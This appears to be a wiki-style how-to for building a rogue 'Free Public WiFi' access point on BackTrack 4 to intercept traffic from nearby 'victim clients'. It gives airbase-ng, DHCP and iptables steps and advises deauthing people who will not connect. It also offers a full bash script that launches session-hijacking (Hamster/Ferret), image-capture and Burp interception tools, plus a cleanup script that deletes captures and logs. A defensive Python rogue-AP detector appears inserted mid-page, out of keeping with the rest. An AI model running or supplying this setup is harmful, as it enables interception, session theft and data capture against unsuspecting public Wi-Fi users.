How-To: Setup and Maintain Fake AP

So you want to set up a fake access point for all those elite hacksters at Starbucks, but you don't know how, eh? Well, as luck would have it, I know just what you want to do. So without further ado, here's what you need to do.

I'm assuming for all of this that you are using BackTrack 4, that you have hardware which is capable of packet injection/monitor mode, and that you have at least a base level of knowledge of Linux (i.e. I don't need to explain how to get online).

  • Start networking (if you haven't already):
service networking start
  • Get Internet access. If you need help configuring your wireless connection, you could always check out Wireless Configuration in Linux for guidance. If you're using WPA2 for your access (which you should be), you can use the WPA2 Configuration Script to do so.
  • Create a monitor interface for the interface which will be used for broadcast/injection (in this example "wlan0" is used):
airmon-ng start wlan0
  • Figure out what your monitor interface is:
ifconfig -a
  • Start the fake access point (in the examples, the monitor interface from above was "mon0"):
    • To create a promiscuous AP (one that doesn't broadcast a name, but will respond to any request/name):
airbase-ng -P mon0
  • Or…
    • To create a fake AP with a specified name (in this example, "Free Public WiFi"):
airbase-ng -P -e "Free Public WiFi" mon0
  • Find out what the AP interface is (normally starts with "at"):
ifconfig -a
  • Set the DHCP server to use the AP interface ("at0" is used in this example):
vi /etc/default/dhcp3-server

The only line needed is as follows:
INTERFACES="at0"
  • Set up the DHCP configuration to use a private subnet:
vi /etc/dhcp3/dhcpd.conf

Edit this to match how addresses will be handed out to the victim clients. In this example, addresses in the range 192.168.121.100 through 192.168.121.254 are used, and the AP (the local computer) has the address 192.168.121.1. The DNS value should be your DNS server (or Google's, as used in the example below).
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.121.0 netmask 255.255.255.0 {
  range 192.168.121.100 192.168.121.254;
  option routers 192.168.121.1;
  option domain-name-servers 8.8.8.8;
}
  • Start the external interface (again, this example is using the sample values shown in the previous steps… modify as needed to match what you used):
ifconfig at0 up 192.168.121.1 netmask 255.255.255.0
  • Start the DHCP server:
service dhcp3-server start
  • Set up routing for packets to/from the fake AP (again, modify to match what you used if you didn't use the default values):
iptables -t nat -A POSTROUTING -o wlan0 -s 192.168.121.0/24 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
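From the defender's side, the two behaviours this setup relies on (answering every probe request because of -P, and advertising a chosen ESSID with -e) are exactly what a wireless IDS watches for. The following is an added example, not part of the original page: a small Python check over constructed probe-response records that flags a BSSID answering for many unrelated SSIDs (karma-style behaviour) and a known ESSID advertised by a BSSID outside a hypothetical allowlist.

```python
"""Rogue-AP indicators from 802.11 probe-response records (added example).

Input records are a constructed sample in the shape a monitor-mode sniffer
could emit: (bssid, ssid, channel). Nothing here is captured from a real network.
"""
from collections import defaultdict

# Constructed sample of probe responses seen in monitor mode.
SAMPLE_PROBE_RESPONSES = [
    ("aa:bb:cc:00:00:01", "CoffeeShop-Guest", 6),
    ("aa:bb:cc:00:00:01", "CoffeeShop-Guest", 6),
    ("de:ad:be:ef:00:01", "CoffeeShop-Guest", 11),   # known ESSID, unknown radio
    ("de:ad:be:ef:00:01", "Free Public WiFi", 11),
    ("de:ad:be:ef:00:01", "HomeNet", 11),
    ("de:ad:be:ef:00:01", "attwifi", 11),
    ("de:ad:be:ef:00:01", "linksys", 11),
]

# Hypothetical allowlist: the venue's legitimate radios (BSSIDs) per ESSID.
KNOWN_BSSIDS = {"CoffeeShop-Guest": {"aa:bb:cc:00:00:01"}}


def ssids_per_bssid(records):
    """Map each BSSID to the set of SSIDs it answered probes for."""
    seen = defaultdict(set)
    for bssid, ssid, _channel in records:
        seen[bssid].add(ssid)
    return seen


def find_promiscuous_aps(records, threshold=3):
    """A single BSSID answering probes for many unrelated SSIDs behaves like a
    promiscuous (airbase-ng -P style) AP that says yes to everything."""
    return sorted(b for b, s in ssids_per_bssid(records).items()
                  if len(s) >= threshold)


def find_evil_twins(records, known=KNOWN_BSSIDS):
    """Return (ssid, bssid) pairs where a known ESSID is advertised by a radio
    that is not on the allowlist for that ESSID."""
    hits = set()
    for bssid, ssid, _channel in records:
        if ssid in known and bssid not in known[ssid]:
            hits.add((ssid, bssid))
    return sorted(hits)


if __name__ == "__main__":
    print("promiscuous APs:", find_promiscuous_aps(SAMPLE_PROBE_RESPONSES))
    print("evil twins:", find_evil_twins(SAMPLE_PROBE_RESPONSES))
```

On a live monitor interface the same two functions can be fed from any sniffer that yields probe responses; the threshold is a tuning knob, since a legitimate multi-SSID AP also answers for a handful of names.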

That's it! At this point you have a working AP (assuming you didn't muck anything up). From this point forward you can start grabbing traffic, modifying things, extracting data… the sky's the limit. For a couple of quick starting points, check out configuring and using Burp Suite and configuring and using Xplico.

And if someone is being all mean and not connecting to you (or was already connected to someone else), just deauth them.

And if you'd like a quick script that starts up everything for you and lets you choose how things will be done, give the following a try:

#!/bin/bash

#################################################
#
# Xylos' Quick-Fire Startup
#
#################################################

# Select a wireless interface to use for the AP
selectWirelessInterface () {
    iwconfig | grep 802 > /tmp/ethlist
    clear
    echo "-------------------------------------------------"
    echo "Available interfaces:"
    echo ""
    cat /tmp/ethlist
    echo ""
    echo "-------------------------------------------------"
    read -p "What interface will you use for the soft AP? " -e wlan 
    rm /tmp/ethlist
}

# Start networking (if selected)
startNetworking () {
    read -p "Start networking [Y/N]? " -e ynanswer 
    if [ "$ynanswer" = "Y" ] ; then
        service networking start > /dev/null 2>&1
    fi
    selectWirelessInterface
    read -p "External USB WLAN present [Y/N]? " -e extusb
    if [ "$extusb" = "Y" ] ; then
       ifconfig $wlan up > /dev/null 2>&1
    fi
}

# Start a monitor on the first wlan adapter
createMonitor () {
    echo -n "Starting monitor device...           "
    ifconfig -a > /tmp/pre
    airmon-ng start $wlan 8 > /dev/null 2>&1 
    sleep 10 
    ifconfig -a > /tmp/post
    monint=`diff /tmp/pre /tmp/post | grep mon | awk '{ print $2 }'`
    echo "DONE"
    # echo "Detected monitor interface: $monint"
}

# Fire up the fake access point
createAP () {
    apname="Free Public WiFi"
    read -p "Use default ESSID [Free Public WiFi]? " -e usedef 
    if [ "$usedef" = "N" ] ; then
        read -p "What will the AP name be? " -e apname
    fi
    read -p "Promiscuous access point [Y/N]? " -e promisc 
    echo "AP name will be $apname"
    echo -n "Starting fake AP...                  "
    # ESSID is quoted so a name with spaces (like the default) reaches airbase-ng as one argument
    if [ "$promisc" = "Y" ] ; then
        airbase-ng -P -e "$apname" "$monint" > /tmp/ap_access_list &
    else
        airbase-ng -e "$apname" "$monint" > /tmp/ap_access_list &
    fi
    sleep 10 
    echo "DONE"
}

# Activate the external interface
activateExternalAccess () {
    echo -n "Enabling external access...          "
    ifconfig at0 up 192.168.121.1 netmask 255.255.255.0 mtu 1500 > /dev/null 2>&1 
    sleep 10 
    echo "DONE"
}

# Start the DHCP server (restart to kill any
# current ones which may exist)
startDHCP () {
    echo -n "Starting DHCP server...              "
    service dhcp3-server restart > /dev/null 2>&1 
    sleep 10
    echo "DONE"
}

# Route things from the fake AP to the world
routeAPClientsToWorld () {
    echo -n "Routing from fake AP to world...     "
    iptables -t nat -A POSTROUTING -o $wlan -s 192.168.121.0/24 -j MASQUERADE > /dev/null 2>&1
    sleep 5
    echo 1 > /proc/sys/net/ipv4/ip_forward
    echo "DONE"
}

# Fire up evil rodents
startRodents () {
    read -p "Start Hamster [Y/N]? " -e starthammy
    if [ "$starthammy" = "Y" ] ; then
        echo -n "Starting Hamster...                  "
        /pentest/sniffers/hamster/hamster &
        echo "DONE"
    fi
    read -p "Start Ferret [Y/N]? " -e startferry
    if [ "$startferry" = "Y" ] ; then
        echo -n "Starting Ferret...                   "
        /pentest/sniffers/hamster/ferret -i at0 &
        echo "DONE"
    fi
    read -p "Do you want to launch the Hamster web interface [Y/N]? " -e hamweb
    if [ "$hamweb" = "Y" ] ; then
        /usr/bin/firefox 127.0.0.1:1234
    fi
}

# Capture all image traffic across the network
captureImages () {
    read -p "Start driftnet [Y/N]? " -e startdrift
    if [ "$startdrift" = "Y" ] ; then
        read -p "Capture images [Y/N]? " -e ynanswer
        echo -n "Starting driftnet...                 "
        if [ "$ynanswer" = "Y" ] ; then
            driftnet -i at0 -a -d /tmp/driftimages
            echo "DONE"
            echo "Image files are stored in /tmp/driftimages"
        else
            driftnet -i at0
            echo "DONE"
        fi
    fi
}

# Start BurpSuite to perform detailed packet analysis
startBurp () {
    read -p "Start BurpSuite [Y/N]? " -e burpstart
    if [ "$burpstart" = "Y" ] ; then
        echo -n "Starting BurpSuite...               "
        /root/burpme.sh > /dev/null 2>&1
        echo "DONE"
    fi
}

#################################################
#
# Main Execution
#
#################################################

clear
echo "             Starting the Fun..."
echo "------------------------------------------"

startNetworking

echo "Get external internet access now, then"
read -p "press Enter to continue." -e throwaway

echo

createMonitor 
createAP
activateExternalAccess
startDHCP
routeAPClientsToWorld
#captureImages
#startRodents
startBurp

echo 
echo "--------------------------------------------"
echo
echo "Everything is running!"
echo
echo "To watch the access point activity, try:"
echo "tail -f /tmp/ap_access_list"
echo 
echo "Have fun!"

And if you want to shut down everything started by the above script, here's the way to do so (in the same format):

#!/bin/bash

#################################################
#
# Xylos' Quick-Fire Shutdown 
#
#################################################

# Stop networking
stopNetworking () {
    service networking stop > /dev/null 2>&1
}

# Stop the monitor interfaces created at startup
# If there are more than 3 of these you need
# to figure out where your life has gone wrong
stopMonitor () {
    echo -n "Stopping monitor device...           "
    airmon-ng stop mon0 > /dev/null 2>&1
    airmon-ng stop mon1 > /dev/null 2>&1
    airmon-ng stop mon2 > /dev/null 2>&1
    sleep 2
    echo "DONE"
}

# Stop the fake access point
killAP () {
    echo -n "Shutting down the fake AP...         "
    # the bracket pattern is quoted so the shell can't glob-expand it; it also keeps grep from matching itself
    basepid=`ps -ef | grep -i '[a]irbase' | awk '{ print $2 }'`
    kill -9 $basepid > /dev/null 2>&1
    echo "DONE"
}

# Kill all external access
killExternalAccess () {
    echo -n "Killing external access...           "
    ifconfig at0 down > /dev/null 2>&1
    sleep 2 
    echo "DONE"
}

# Stop the DHCP server
stopDHCP () {
    echo -n "Stopping DHCP server...              "
    service dhcp3-server stop > /dev/null 2>&1
    sleep 2 
    echo "DONE"
}

# Kill routing and forwarding
noRouteAPClients () {
    echo -n "Killing routing...                   "
    iptables -t nat -D POSTROUTING -o wlan0 -s 192.168.121.0/24 -j MASQUERADE > /dev/null 2>&1
    echo 0 > /proc/sys/net/ipv4/ip_forward
    echo "DONE"
}

# Kill any logs or captures that were generated
killLogs () {
    echo -n "Killing logs...                      "
    rm -f /tmp/ap_access_list > /dev/null 2>&1
    rm -f /tmp/ethlist > /dev/null 2>&1
    rm -Rf /tmp/driftimages > /dev/null 2>&1
    rm -f /tmp/pre > /dev/null 2>&1
    rm -f /tmp/post > /dev/null 2>&1
    echo "DONE"
}

#################################################
#
# Main Execution
#
#################################################

clear
echo "        Clean Killing Everything..."
echo "------------------------------------------"
echo 
noRouteAPClients
stopDHCP
killExternalAccess
killAP
stopMonitor
stopNetworking
killLogs

echo 
echo "--------------------------------------------"
echo
echo "Shutdown complete!"
echo

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 3.0 License